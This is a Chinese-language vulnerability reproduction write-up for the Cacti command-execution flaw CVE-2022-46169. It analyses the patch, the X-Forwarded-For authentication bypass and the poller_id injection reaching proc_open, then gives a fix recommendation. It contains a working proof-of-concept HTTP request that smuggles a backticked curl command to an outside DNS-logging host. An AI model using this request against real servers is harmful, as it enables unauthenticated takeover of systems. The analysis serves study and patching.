漏洞复现-Cacti命令执行漏洞 (CVE-2022-46169)

1.漏洞描述

复制代码
Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具,可为用户提供强大且可扩展的操作监控和故障管理框架。
复制代码
该漏洞存在于remote_agent.php文件中,未经身份验证的恶意攻击者可以通过设置HTTP_变量绕过身份验证,再通过构造特殊的$poller_id 参数来触发proc_open() 函数,成功利用此漏洞可在目标服务器上执行任意命令,获取服务器的控制权限。

2.影响版本

Cacti < 1.2.23

3.影响范围

4.漏洞分析

复制代码
我们先看补丁
复制代码
https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216
复制代码
漏洞点主要存在于lib/functions.php、remote_agent.php
复制代码
分为登录绕过和命令注入

登录绕过

复制代码
我们先跟进 get_client_addr看看
复制代码
函数的作用是从 X-Forwarded-For等参数中获取值,filter_var 进行过滤,正确的地址就可以返回,X-Forwarded-For 参数可控,可以对其进行修改 
复制代码
接下来看remote_client_authorized函数的下半部分
复制代码
gethostbyaddr 对 client_addr 获取网络主机名,当 $client_name 与 $client_addr 不同时, 进入remote_agent_strip_domain 函数
复制代码
函数就是截取点号前面的值 大多数情况下,我们传进去的值为 127.0.0.1 时,就会返回 true 了 因此我们可以通过修改 X-Forwarded-For 来绕过这里的认证

命令注入

复制代码
我们先看一下修复记录
复制代码
跟进get_nfilter_request_var函数
复制代码
函数的作用是直接获取参数,没用过滤
复制代码
这里的 $local_data_ids也是传进来的值,可控。

接下来我们关注这里的 $items ,是从数据库的 poller_item 表中取出来的,默认为空。

接下来当 $items 有了数据并且他的成员中有一个 item 也是一个数组并且键为 action,值为 2 时,即可进入命令注入的漏洞所在

复制代码
在385 行有 proc_open可以命令执行。
复制代码
Poc:
复制代码
GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`curl+dnslog.cn` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: localhost.lan
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

5. 修复建议

官方已经提供修复的版本,直接 github 下载即可
https://github.com/Cacti/cacti

相关推荐
带娃的IT创业者9 小时前
突破算力与安全的边界:深度解析 Mythos AI 的“受信发布”机制与技术影响
人工智能·安全·大语言模型·ai安全·mythos ai·受信发布·ai监管
落寞的星星10 小时前
引言:加密不等于安全
安全
SRET10 小时前
Mineradio 沙盒隔离安装完全指南 | 一键安全运行 Electron 应用!!!
javascript·经验分享·安全·electron·aigc·音视频·ai编程
全栈前端老曹10 小时前
【MongoDB】安全与权限管理 —— 用户认证、角色权限、SSL 加密
前端·javascript·数据库·安全·mongodb·nosql·ssl
星河耀银海10 小时前
大模型安全:对抗攻击与防御方法
人工智能·安全·大模型
广东帝工智能安防11 小时前
智能设防精准预警,筑牢内河桥梁通航安全防护网
安全·桥梁防撞·智慧航道·防撞预警系统
kali-Myon12 小时前
某校园门禁系统高危 SQL 注入漏洞挖掘复盘
数据库·sql·安全·web安全
志栋智能12 小时前
超自动化安全中的威胁狩猎
运维·安全·自动化
梦想的颜色13 小时前
【Docker部署插件】:使用 Docker 部署生产级 Kafka 完整版教程
安全·docker·中间件·kafka·消息队列·docker-compose·后端开发
lularible15 小时前
HSM技术精讲(3.8):证书对象——数字世界的“身份证明“
安全·开源·嵌入式·汽车电子·hsm